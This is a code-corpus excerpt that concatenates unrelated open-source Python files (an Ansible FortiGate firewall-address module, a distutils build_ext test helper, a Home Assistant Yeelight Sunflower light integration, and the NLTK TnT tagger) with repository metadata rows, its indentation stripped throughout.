policy-group: "<your_own_value>"
sdn: "aci"
sdn-tag: "<your_own_value>"
start-ip: "<your_own_value>"
subnet: "<your_own_value>"
subnet-name: "<your_own_value>"
tagging:
-
category: "<your_own_value> (source system.object-tagging.category)"
name: "default_name_26"
tags:
-
name: "default_name_28 (source system.object-tagging.tags.name)"
tenant: "<your_own_value>"
type: "ipmask"
uuid: "<your_own_value>"
visibility: "enable"
wildcard: "<your_own_value>"
wildcard-fqdn: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_firewall_address_data(json):
option_list = ['allow-routing', 'associated-interface', 'cache-ttl',
'color', 'comment', 'country',
'end-ip', 'epg-name', 'filter',
'fqdn', 'list', 'name',
'obj-id', 'organization', 'policy-group',
'sdn', 'sdn-tag', 'start-ip',
'subnet', 'subnet-name', 'tagging',
'tenant', 'type', 'uuid',
'visibility', 'wildcard', 'wildcard-fqdn']
dictionary = {}
for attribute in option_list:
if attribute in json:
dictionary[attribute] = json[attribute]
return dictionary
def firewall_address(data, fos):
vdom = data['vdom']
firewall_address_data = data['firewall_address']
filtered_data = filter_firewall_address_data(firewall_address_data)
if firewall_address_data['state'] == "present":
return fos.set('firewall',
'address',
data=filtered_data,
vdom=vdom)
elif firewall_address_data['state'] == "absent":
return fos.delete('firewall',
'address',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_firewall(data, fos):
login(data)
methodlist = ['firewall_address']
for method in methodlist:
if data[method]:
resp = eval(method)(data, fos)
break
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": "False"},
"firewall_address": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"allow-routing": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"associated-interface": {"required": False, "type": "str"},
"cache-ttl": {"required": False, "type": "int"},
"color": {"required": False, "type": "int"},
"comment": {"required": False, "type": "str"},
"country": {"required": False, "type": "str"},
"end-ip": {"required": False, "type": "str"},
"epg-name": {"required": False, "type": "str"},
"filter": {"required": False, "type": "str"},
"fqdn": {"required": False, "type": "str"},
"list": {"required": False, "type": "list",
"options": {
"ip": {"required": True, "type": "str"}
}},
"name": {"required": True, "type": "str"},
"obj-id": {"required": False, "type": "str"},
"organization": {"required": False, "type": "str"},
"policy-group": {"required": False, "type": "str"},
"sdn": {"required": False, "type": "str",
"choices": ["aci", "aws", "azure",
"gcp", "nsx", "nuage",
"oci"]},
"sdn-tag": {"required": False, "type": "str"},
"start-ip": {"required": False, "type": "str"},
"subnet": {"required": False, "type": "str"},
"subnet-name": {"required": False, "type": "str"},
"tagging": {"required": False, "type": "list",
"options": {
"category": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"tags": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}}
}},
"tenant": {"required": False, "type": "str"},
"type": {"required": False, "type": "str",
"choices": ["ipmask", "iprange", "fqdn",
"geography", "wildcard", "wildcard-fqdn",
"dynamic"]},
"uuid": {"required": False, "type": "str"},
"visibility": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"wildcard": {"required": False, "type": "str"},
"wildcard-fqdn": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_firewall(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | -6,537,436,329,098,680,000 | 32.821277 | 111 | 0.490627 | false |
flyher/pymo | android/pgs4a-0.9.6/python-install/lib/python2.7/distutils/tests/setuptools_build_ext.py | 149 | 11489 | from distutils.command.build_ext import build_ext as _du_build_ext
try:
# Attempt to use Pyrex for building extensions, if available
from Pyrex.Distutils.build_ext import build_ext as _build_ext
except ImportError:
_build_ext = _du_build_ext
import os, sys
from distutils.file_util import copy_file
from distutils.tests.setuptools_extension import Library
from distutils.ccompiler import new_compiler
from distutils.sysconfig import customize_compiler, get_config_var
get_config_var("LDSHARED") # make sure _config_vars is initialized
from distutils.sysconfig import _config_vars
from distutils import log
from distutils.errors import *
have_rtld = False
use_stubs = False
libtype = 'shared'
if sys.platform == "darwin":
use_stubs = True
elif os.name != 'nt':
try:
from dl import RTLD_NOW
have_rtld = True
use_stubs = True
except ImportError:
pass
def if_dl(s):
if have_rtld:
return s
return ''
class build_ext(_build_ext):
def run(self):
"""Build extensions in build directory, then copy if --inplace"""
old_inplace, self.inplace = self.inplace, 0
_build_ext.run(self)
self.inplace = old_inplace
if old_inplace:
self.copy_extensions_to_source()
def copy_extensions_to_source(self):
build_py = self.get_finalized_command('build_py')
for ext in self.extensions:
fullname = self.get_ext_fullname(ext.name)
filename = self.get_ext_filename(fullname)
modpath = fullname.split('.')
package = '.'.join(modpath[:-1])
package_dir = build_py.get_package_dir(package)
dest_filename = os.path.join(package_dir,os.path.basename(filename))
src_filename = os.path.join(self.build_lib,filename)
# Always copy, even if source is older than destination, to ensure
# that the right extensions for the current Python/platform are
# used.
copy_file(
src_filename, dest_filename, verbose=self.verbose,
dry_run=self.dry_run
)
if ext._needs_stub:
self.write_stub(package_dir or os.curdir, ext, True)
if _build_ext is not _du_build_ext and not hasattr(_build_ext,'pyrex_sources'):
# Workaround for problems using some Pyrex versions w/SWIG and/or 2.4
def swig_sources(self, sources, *otherargs):
# first do any Pyrex processing
sources = _build_ext.swig_sources(self, sources) or sources
# Then do any actual SWIG stuff on the remainder
return _du_build_ext.swig_sources(self, sources, *otherargs)
def get_ext_filename(self, fullname):
filename = _build_ext.get_ext_filename(self,fullname)
ext = self.ext_map[fullname]
if isinstance(ext,Library):
fn, ext = os.path.splitext(filename)
return self.shlib_compiler.library_filename(fn,libtype)
elif use_stubs and ext._links_to_dynamic:
d,fn = os.path.split(filename)
return os.path.join(d,'dl-'+fn)
else:
return filename
def initialize_options(self):
_build_ext.initialize_options(self)
self.shlib_compiler = None
self.shlibs = []
self.ext_map = {}
def finalize_options(self):
_build_ext.finalize_options(self)
self.extensions = self.extensions or []
self.check_extensions_list(self.extensions)
self.shlibs = [ext for ext in self.extensions
if isinstance(ext,Library)]
if self.shlibs:
self.setup_shlib_compiler()
for ext in self.extensions:
ext._full_name = self.get_ext_fullname(ext.name)
for ext in self.extensions:
fullname = ext._full_name
self.ext_map[fullname] = ext
ltd = ext._links_to_dynamic = \
self.shlibs and self.links_to_dynamic(ext) or False
ext._needs_stub = ltd and use_stubs and not isinstance(ext,Library)
filename = ext._file_name = self.get_ext_filename(fullname)
libdir = os.path.dirname(os.path.join(self.build_lib,filename))
if ltd and libdir not in ext.library_dirs:
ext.library_dirs.append(libdir)
if ltd and use_stubs and os.curdir not in ext.runtime_library_dirs:
ext.runtime_library_dirs.append(os.curdir)
def setup_shlib_compiler(self):
compiler = self.shlib_compiler = new_compiler(
compiler=self.compiler, dry_run=self.dry_run, force=self.force
)
if sys.platform == "darwin":
tmp = _config_vars.copy()
try:
# XXX Help! I don't have any idea whether these are right...
_config_vars['LDSHARED'] = "gcc -Wl,-x -dynamiclib -undefined dynamic_lookup"
_config_vars['CCSHARED'] = " -dynamiclib"
_config_vars['SO'] = ".dylib"
customize_compiler(compiler)
finally:
_config_vars.clear()
_config_vars.update(tmp)
else:
customize_compiler(compiler)
if self.include_dirs is not None:
compiler.set_include_dirs(self.include_dirs)
if self.define is not None:
# 'define' option is a list of (name,value) tuples
for (name,value) in self.define:
compiler.define_macro(name, value)
if self.undef is not None:
for macro in self.undef:
compiler.undefine_macro(macro)
if self.libraries is not None:
compiler.set_libraries(self.libraries)
if self.library_dirs is not None:
compiler.set_library_dirs(self.library_dirs)
if self.rpath is not None:
compiler.set_runtime_library_dirs(self.rpath)
if self.link_objects is not None:
compiler.set_link_objects(self.link_objects)
# hack so distutils' build_extension() builds a library instead
compiler.link_shared_object = link_shared_object.__get__(compiler)
def get_export_symbols(self, ext):
if isinstance(ext,Library):
return ext.export_symbols
return _build_ext.get_export_symbols(self,ext)
def build_extension(self, ext):
_compiler = self.compiler
try:
if isinstance(ext,Library):
self.compiler = self.shlib_compiler
_build_ext.build_extension(self,ext)
if ext._needs_stub:
self.write_stub(
self.get_finalized_command('build_py').build_lib, ext
)
finally:
self.compiler = _compiler
def links_to_dynamic(self, ext):
"""Return true if 'ext' links to a dynamic lib in the same package"""
# XXX this should check to ensure the lib is actually being built
# XXX as dynamic, and not just using a locally-found version or a
# XXX static-compiled version
libnames = dict.fromkeys([lib._full_name for lib in self.shlibs])
pkg = '.'.join(ext._full_name.split('.')[:-1]+[''])
for libname in ext.libraries:
if pkg+libname in libnames: return True
return False
def get_outputs(self):
outputs = _build_ext.get_outputs(self)
optimize = self.get_finalized_command('build_py').optimize
for ext in self.extensions:
if ext._needs_stub:
base = os.path.join(self.build_lib, *ext._full_name.split('.'))
outputs.append(base+'.py')
outputs.append(base+'.pyc')
if optimize:
outputs.append(base+'.pyo')
return outputs
def write_stub(self, output_dir, ext, compile=False):
log.info("writing stub loader for %s to %s",ext._full_name, output_dir)
stub_file = os.path.join(output_dir, *ext._full_name.split('.'))+'.py'
if compile and os.path.exists(stub_file):
raise DistutilsError(stub_file+" already exists! Please delete.")
if not self.dry_run:
f = open(stub_file,'w')
f.write('\n'.join([
"def __bootstrap__():",
" global __bootstrap__, __file__, __loader__",
" import sys, os, pkg_resources, imp"+if_dl(", dl"),
" __file__ = pkg_resources.resource_filename(__name__,%r)"
% os.path.basename(ext._file_name),
" del __bootstrap__",
" if '__loader__' in globals():",
" del __loader__",
if_dl(" old_flags = sys.getdlopenflags()"),
" old_dir = os.getcwd()",
" try:",
" os.chdir(os.path.dirname(__file__))",
if_dl(" sys.setdlopenflags(dl.RTLD_NOW)"),
" imp.load_dynamic(__name__,__file__)",
" finally:",
if_dl(" sys.setdlopenflags(old_flags)"),
" os.chdir(old_dir)",
"__bootstrap__()",
"" # terminal \n
]))
f.close()
if compile:
from distutils.util import byte_compile
byte_compile([stub_file], optimize=0,
force=True, dry_run=self.dry_run)
optimize = self.get_finalized_command('install_lib').optimize
if optimize > 0:
byte_compile([stub_file], optimize=optimize,
force=True, dry_run=self.dry_run)
if os.path.exists(stub_file) and not self.dry_run:
os.unlink(stub_file)
if use_stubs or os.name=='nt':
# Build shared libraries
#
def link_shared_object(self, objects, output_libname, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None
): self.link(
self.SHARED_LIBRARY, objects, output_libname,
output_dir, libraries, library_dirs, runtime_library_dirs,
export_symbols, debug, extra_preargs, extra_postargs,
build_temp, target_lang
)
else:
# Build static libraries everywhere else
libtype = 'static'
def link_shared_object(self, objects, output_libname, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None
):
# XXX we need to either disallow these attrs on Library instances,
# or warn/abort here if set, or something...
#libraries=None, library_dirs=None, runtime_library_dirs=None,
#export_symbols=None, extra_preargs=None, extra_postargs=None,
#build_temp=None
assert output_dir is None # distutils build_ext doesn't pass this
output_dir,filename = os.path.split(output_libname)
basename, ext = os.path.splitext(filename)
if self.library_filename("x").startswith('lib'):
# strip 'lib' prefix; this is kludgy if some platform uses
# a different prefix
basename = basename[3:]
self.create_static_lib(
objects, basename, output_dir, debug, target_lang
)
| mit | -3,508,374,496,247,061,500 | 39.031359 | 93 | 0.582731 | false |
w1ll1am23/home-assistant | homeassistant/components/yeelightsunflower/light.py | 21 | 3638 | """Support for Yeelight Sunflower color bulbs (not Yeelight Blue or WiFi)."""
import logging
import voluptuous as vol
import yeelightsunflower
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_HS_COLOR,
PLATFORM_SCHEMA,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
LightEntity,
)
from homeassistant.const import CONF_HOST
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
_LOGGER = logging.getLogger(__name__)
SUPPORT_YEELIGHT_SUNFLOWER = SUPPORT_BRIGHTNESS | SUPPORT_COLOR
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_HOST): cv.string})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Yeelight Sunflower Light platform."""
host = config.get(CONF_HOST)
hub = yeelightsunflower.Hub(host)
if not hub.available:
_LOGGER.error("Could not connect to Yeelight Sunflower hub")
return False
add_entities(SunflowerBulb(light) for light in hub.get_lights())
class SunflowerBulb(LightEntity):
"""Representation of a Yeelight Sunflower Light."""
def __init__(self, light):
"""Initialize a Yeelight Sunflower bulb."""
self._light = light
self._available = light.available
self._brightness = light.brightness
self._is_on = light.is_on
self._rgb_color = light.rgb_color
self._unique_id = light.zid
@property
def name(self):
"""Return the display name of this light."""
return f"sunflower_{self._light.zid}"
@property
def unique_id(self):
"""Return the unique ID of this light."""
return self._unique_id
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def is_on(self):
"""Return true if light is on."""
return self._is_on
@property
def brightness(self):
"""Return the brightness is 0-255; Yeelight's brightness is 0-100."""
return int(self._brightness / 100 * 255)
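    # For example (added for clarity): a hub brightness of 50 out of 100 is
    # reported to Home Assistant as int(50 / 100 * 255) = 127.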
@property
def hs_color(self):
"""Return the color property."""
return color_util.color_RGB_to_hs(*self._rgb_color)
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_YEELIGHT_SUNFLOWER
def turn_on(self, **kwargs):
"""Instruct the light to turn on, optionally set colour/brightness."""
# when no arguments, just turn light on (full brightness)
if not kwargs:
self._light.turn_on()
else:
if ATTR_HS_COLOR in kwargs and ATTR_BRIGHTNESS in kwargs:
rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
bright = int(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
self._light.set_all(rgb[0], rgb[1], rgb[2], bright)
elif ATTR_HS_COLOR in kwargs:
rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
self._light.set_rgb_color(rgb[0], rgb[1], rgb[2])
elif ATTR_BRIGHTNESS in kwargs:
bright = int(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
self._light.set_brightness(bright)
def turn_off(self, **kwargs):
"""Instruct the light to turn off."""
self._light.turn_off()
def update(self):
"""Fetch new state data for this light and update local values."""
self._light.update()
self._available = self._light.available
self._brightness = self._light.brightness
self._is_on = self._light.is_on
self._rgb_color = self._light.rgb_color
| apache-2.0 | -1,719,767,012,948,952,000 | 31.482143 | 78 | 0.629192 | false |
syllog1sm/TextBlob | text/nltk/tag/tnt.py | 2 | 18395 | # Natural Language Toolkit: TnT Tagger
#
# Copyright (C) 2001-2013 NLTK Project
# Author: Sam Huston <[email protected]>
#
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
'''
Implementation of 'TnT - A Statistical Part of Speech Tagger'
by Thorsten Brants
http://acl.ldc.upenn.edu/A/A00/A00-1031.pdf
'''
from __future__ import print_function
from math import log
from operator import itemgetter
from nltk.probability import FreqDist, ConditionalFreqDist
from nltk.tag.api import TaggerI
class TnT(TaggerI):
'''
TnT - Statistical POS tagger
IMPORTANT NOTES:
* DOES NOT AUTOMATICALLY DEAL WITH UNSEEN WORDS
- It is possible to provide an untrained POS tagger to
create tags for unknown words, see __init__ function
* SHOULD BE USED WITH SENTENCE-DELIMITED INPUT
- Due to the nature of this tagger, it works best when
trained over sentence delimited input.
- However it still produces good results if the training
data and testing data are separated on all punctuation eg: [,.?!]
- Input for training is expected to be a list of sentences
where each sentence is a list of (word, tag) tuples
- Input for tag function is a single sentence
Input for tagdata function is a list of sentences
Output is of a similar form
* Function provided to process text that is unsegmented
- Please see basic_sent_chop()
TnT uses a second order Markov model to produce tags for
a sequence of input, specifically:
argmax [Proj(P(t_i|t_i-1,t_i-2)P(w_i|t_i))] P(t_T+1 | t_T)
IE: the maximum projection of a set of probabilities
The set of possible tags for a given word is derived
from the training data. It is the set of all tags
that exact word has been assigned.
To speed up and get more precision, we can use log addition
    instead of multiplication, specifically:
argmax [Sigma(log(P(t_i|t_i-1,t_i-2))+log(P(w_i|t_i)))] +
log(P(t_T+1|t_T))
The probability of a tag for a given word is the linear
interpolation of 3 markov models; a zero-order, first-order,
and a second order model.
P(t_i| t_i-1, t_i-2) = l1*P(t_i) + l2*P(t_i| t_i-1) +
l3*P(t_i| t_i-1, t_i-2)
A beam search is used to limit the memory usage of the algorithm.
The degree of the beam can be changed using N in the initialization.
N represents the maximum number of possible solutions to maintain
while tagging.
It is possible to differentiate the tags which are assigned to
capitalized words. However this does not result in a significant
gain in the accuracy of the results.
'''
def __init__(self, unk=None, Trained=False, N=1000, C=False):
'''
Construct a TnT statistical tagger. Tagger must be trained
before being used to tag input.
:param unk: instance of a POS tagger, conforms to TaggerI
:type unk:(TaggerI)
:param Trained: Indication that the POS tagger is trained or not
:type Trained: boolean
:param N: Beam search degree (see above)
:type N:(int)
:param C: Capitalization flag
:type C: boolean
Initializer, creates frequency distributions to be used
for tagging
_lx values represent the portion of the tri/bi/uni taggers
to be used to calculate the probability
N value is the number of possible solutions to maintain
while tagging. A good value for this is 1000
C is a boolean value which specifies to use or
not use the Capitalization of the word as additional
information for tagging.
NOTE: using capitalization may not increase the accuracy
of the tagger
'''
self._uni = FreqDist()
self._bi = ConditionalFreqDist()
self._tri = ConditionalFreqDist()
self._wd = ConditionalFreqDist()
self._eos = ConditionalFreqDist()
self._l1 = 0.0
self._l2 = 0.0
self._l3 = 0.0
self._N = N
self._C = C
self._T = Trained
self._unk = unk
# statistical tools (ignore or delete me)
self.unknown = 0
self.known = 0
def train(self, data):
'''
Uses a set of tagged data to train the tagger.
If an unknown word tagger is specified,
it is trained on the same data.
:param data: List of lists of (word, tag) tuples
:type data: tuple(str)
'''
# Ensure that local C flag is initialized before use
C = False
if self._unk is not None and self._T == False:
self._unk.train(data)
for sent in data:
history = [('BOS',False), ('BOS',False)]
for w, t in sent:
# if capitalization is requested,
# and the word begins with a capital
# set local flag C to True
if self._C and w[0].isupper(): C=True
self._wd[w].inc(t)
self._uni.inc((t,C))
self._bi[history[1]].inc((t,C))
self._tri[tuple(history)].inc((t,C))
history.append((t,C))
history.pop(0)
# set local flag C to false for the next word
C = False
self._eos[t].inc('EOS')
# compute lambda values from the trained frequency distributions
self._compute_lambda()
#(debugging -- ignore or delete me)
#print "lambdas"
#print i, self._l1, i, self._l2, i, self._l3
def _compute_lambda(self):
'''
creates lambda values based upon training data
NOTE: no need to explicitly reference C,
it is contained within the tag variable :: tag == (tag,C)
for each tag trigram (t1, t2, t3)
depending on the maximum value of
- f(t1,t2,t3)-1 / f(t1,t2)-1
- f(t2,t3)-1 / f(t2)-1
- f(t3)-1 / N-1
increment l3,l2, or l1 by f(t1,t2,t3)
ISSUES -- Resolutions:
if 2 values are equal, increment both lambda values
by (f(t1,t2,t3) / 2)
'''
# temporary lambda variables
tl1 = 0.0
tl2 = 0.0
tl3 = 0.0
# for each t1,t2 in system
for history in self._tri.conditions():
(h1, h2) = history
# for each t3 given t1,t2 in system
# (NOTE: tag actually represents (tag,C))
# However no effect within this function
for tag in self._tri[history].samples():
# if there has only been 1 occurrence of this tag in the data
# then ignore this trigram.
if self._uni[tag] == 1:
continue
# safe_div provides a safe floating point division
# it returns -1 if the denominator is 0
c3 = self._safe_div((self._tri[history][tag]-1), (self._tri[history].N()-1))
c2 = self._safe_div((self._bi[h2][tag]-1), (self._bi[h2].N()-1))
c1 = self._safe_div((self._uni[tag]-1), (self._uni.N()-1))
# if c1 is the maximum value:
if (c1 > c3) and (c1 > c2):
tl1 += self._tri[history][tag]
# if c2 is the maximum value
elif (c2 > c3) and (c2 > c1):
tl2 += self._tri[history][tag]
# if c3 is the maximum value
elif (c3 > c2) and (c3 > c1):
tl3 += self._tri[history][tag]
# if c3, and c2 are equal and larger than c1
elif (c3 == c2) and (c3 > c1):
tl2 += float(self._tri[history][tag]) /2.0
tl3 += float(self._tri[history][tag]) /2.0
# if c1, and c2 are equal and larger than c3
# this might be a dumb thing to do....(not sure yet)
elif (c2 == c1) and (c1 > c3):
tl1 += float(self._tri[history][tag]) /2.0
tl2 += float(self._tri[history][tag]) /2.0
# otherwise there might be a problem
# eg: all values = 0
else:
#print "Problem", c1, c2 ,c3
pass
# Lambda normalisation:
# ensures that l1+l2+l3 = 1
self._l1 = tl1 / (tl1+tl2+tl3)
self._l2 = tl2 / (tl1+tl2+tl3)
self._l3 = tl3 / (tl1+tl2+tl3)
def _safe_div(self, v1, v2):
'''
Safe floating point division function, does not allow division by 0
returns -1 if the denominator is 0
'''
if v2 == 0:
return -1
else:
return float(v1) / float(v2)
def tagdata(self, data):
'''
Tags each sentence in a list of sentences
:param data:list of list of words
:type data: [[string,],]
:return: list of list of (word, tag) tuples
Invokes tag(sent) function for each sentence
compiles the results into a list of tagged sentences
each tagged sentence is a list of (word, tag) tuples
'''
res = []
for sent in data:
res1 = self.tag(sent)
res.append(res1)
return res
def tag(self, data):
'''
Tags a single sentence
:param data: list of words
:type data: [string,]
:return: [(word, tag),]
Calls recursive function '_tagword'
to produce a list of tags
Associates the sequence of returned tags
with the correct words in the input sequence
returns a list of (word, tag) tuples
'''
current_state = [(['BOS', 'BOS'], 0.0)]
sent = list(data)
tags = self._tagword(sent, current_state)
res = []
for i in range(len(sent)):
# unpack and discard the C flags
(t,C) = tags[i+2]
res.append((sent[i], t))
return res
def _tagword(self, sent, current_states):
'''
:param sent : List of words remaining in the sentence
:type sent : [word,]
:param current_states : List of possible tag combinations for
the sentence so far, and the log probability
associated with each tag combination
:type current_states : [([tag, ], logprob), ]
Tags the first word in the sentence and
        recursively tags the remainder of the sentence
Uses formula specified above to calculate the probability
of a particular tag
'''
        # if this word marks the end of the sentence,
# return the most probable tag
if sent == []:
(h, logp) = current_states[0]
return h
# otherwise there are more words to be tagged
word = sent[0]
sent = sent[1:]
new_states = []
# if the Capitalisation is requested,
        # initialise the flag for this word
C = False
if self._C and word[0].isupper(): C=True
# if word is known
# compute the set of possible tags
# and their associated log probabilities
if word in self._wd.conditions():
self.known += 1
for (history, curr_sent_logprob) in current_states:
logprobs = []
for t in self._wd[word].samples():
p_uni = self._uni.freq((t,C))
p_bi = self._bi[history[-1]].freq((t,C))
p_tri = self._tri[tuple(history[-2:])].freq((t,C))
p_wd = float(self._wd[word][t])/float(self._uni[(t,C)])
p = self._l1 *p_uni + self._l2 *p_bi + self._l3 *p_tri
p2 = log(p, 2) + log(p_wd, 2)
logprobs.append(((t,C), p2))
# compute the result of appending each tag to this history
for (tag, logprob) in logprobs:
new_states.append((history + [tag],
curr_sent_logprob + logprob))
# otherwise a new word, set of possible tags is unknown
else:
self.unknown += 1
# since a set of possible tags,
# and the probability of each specific tag
# can not be returned from most classifiers:
# specify that any unknown words are tagged with certainty
p = 1
# if no unknown word tagger has been specified
# then use the tag 'Unk'
if self._unk is None:
tag = ('Unk',C)
# otherwise apply the unknown word tagger
else :
[(_w, t)] = list(self._unk.tag([word]))
tag = (t,C)
for (history, logprob) in current_states:
history.append(tag)
new_states = current_states
# now have computed a set of possible new_states
# sort states by log prob
# set is now ordered greatest to least log probability
new_states.sort(reverse=True, key=itemgetter(1))
# del everything after N (threshold)
# this is the beam search cut
if len(new_states) > self._N:
new_states = new_states[:self._N]
# compute the tags for the rest of the sentence
# return the best list of tags for the sentence
return self._tagword(sent, new_states)
########################################
# helper function -- basic sentence tokenizer
########################################
def basic_sent_chop(data, raw=True):
'''
Basic method for tokenizing input into sentences
for this tagger:
:param data: list of tokens (words or (word, tag) tuples)
:type data: str or tuple(str, str)
:param raw: boolean flag marking the input data
as a list of words or a list of tagged words
:type raw: bool
:return: list of sentences
sentences are a list of tokens
tokens are the same as the input
Function takes a list of tokens and separates the tokens into lists
where each list represents a sentence fragment
This function can separate both tagged and raw sequences into
basic sentences.
Sentence markers are the set of [,.!?]
This is a simple method which enhances the performance of the TnT
tagger. Better sentence tokenization will further enhance the results.
'''
new_data = []
curr_sent = []
sent_mark = [',','.','?','!']
if raw:
for word in data:
if word in sent_mark:
curr_sent.append(word)
new_data.append(curr_sent)
curr_sent = []
else:
curr_sent.append(word)
else:
for (word,tag) in data:
if word in sent_mark:
curr_sent.append((word,tag))
new_data.append(curr_sent)
curr_sent = []
else:
curr_sent.append((word,tag))
return new_data
def demo():
from nltk.corpus import brown
sents = list(brown.tagged_sents())
test = list(brown.sents())
# create and train the tagger
tagger = TnT()
tagger.train(sents[200:1000])
# tag some data
tagged_data = tagger.tagdata(test[100:120])
# print results
for j in range(len(tagged_data)):
s = tagged_data[j]
t = sents[j+100]
for i in range(len(s)):
print(s[i],'--', t[i])
print()
def demo2():
from nltk.corpus import treebank
d = list(treebank.tagged_sents())
t = TnT(N=1000, C=False)
s = TnT(N=1000, C=True)
t.train(d[(11)*100:])
s.train(d[(11)*100:])
for i in range(10):
tacc = t.evaluate(d[i*100:((i+1)*100)])
tp_un = float(t.unknown) / float(t.known +t.unknown)
tp_kn = float(t.known) / float(t.known + t.unknown)
t.unknown = 0
t.known = 0
print('Capitalization off:')
print('Accuracy:', tacc)
print('Percentage known:', tp_kn)
print('Percentage unknown:', tp_un)
print('Accuracy over known words:', (tacc / tp_kn))
sacc = s.evaluate(d[i*100:((i+1)*100)])
sp_un = float(s.unknown) / float(s.known +s.unknown)
sp_kn = float(s.known) / float(s.known + s.unknown)
s.unknown = 0
s.known = 0
print('Capitalization on:')
print('Accuracy:', sacc)
print('Percentage known:', sp_kn)
print('Percentage unknown:', sp_un)
print('Accuracy over known words:', (sacc / sp_kn))
def demo3():
from nltk.corpus import treebank, brown
d = list(treebank.tagged_sents())
e = list(brown.tagged_sents())
d = d[:1000]
e = e[:1000]
d10 = int(len(d)*0.1)
e10 = int(len(e)*0.1)
tknacc = 0
sknacc = 0
tallacc = 0
sallacc = 0
tknown = 0
sknown = 0
for i in range(10):
t = TnT(N=1000, C=False)
s = TnT(N=1000, C=False)
dtest = d[(i*d10):((i+1)*d10)]
etest = e[(i*e10):((i+1)*e10)]
dtrain = d[:(i*d10)] + d[((i+1)*d10):]
etrain = e[:(i*e10)] + e[((i+1)*e10):]
t.train(dtrain)
s.train(etrain)
tacc = t.evaluate(dtest)
tp_un = float(t.unknown) / float(t.known +t.unknown)
tp_kn = float(t.known) / float(t.known + t.unknown)
tknown += tp_kn
t.unknown = 0
t.known = 0
sacc = s.evaluate(etest)
sp_un = float(s.unknown) / float(s.known + s.unknown)
sp_kn = float(s.known) / float(s.known + s.unknown)
sknown += sp_kn
s.unknown = 0
s.known = 0
tknacc += (tacc / tp_kn)
sknacc += (sacc / tp_kn)
tallacc += tacc
sallacc += sacc
#print i+1, (tacc / tp_kn), i+1, (sacc / tp_kn), i+1, tacc, i+1, sacc
print("brown: acc over words known:", 10 * tknacc)
print(" : overall accuracy:", 10 * tallacc)
print(" : words known:", 10 * tknown)
print("treebank: acc over words known:", 10 * sknacc)
print(" : overall accuracy:", 10 * sallacc)
print(" : words known:", 10 * sknown)
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
| mit | -6,458,898,123,796,336,000 | 29.304778 | 92 | 0.545692 | false |
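The tagging score in the TnT implementation above (see _compute_lambda and _tagword) is a linear interpolation of unigram, bigram and trigram estimates, accumulated in log space per word. The tiny self-contained sketch below shows that combination with made-up probabilities; every number in it is hypothetical and not taken from any corpus.

from math import log

# Hypothetical relative frequencies for one candidate tag t with history (t1, t2).
p_uni = 0.05   # P(t)
p_bi = 0.20    # P(t | t2)
p_tri = 0.60   # P(t | t1, t2)
p_wd = 0.30    # P(word | t)
l1, l2, l3 = 0.15, 0.35, 0.50   # interpolation weights, normalised to sum to 1

p = l1 * p_uni + l2 * p_bi + l3 * p_tri   # interpolated tag probability
logprob = log(p, 2) + log(p_wd, 2)        # per-word score added to the beam state
print("P(t | t1, t2) =", p, " log2 contribution =", logprob)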
barnone/EigenD | plg_midi/midi_input_plg.py | 1 | 16450 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
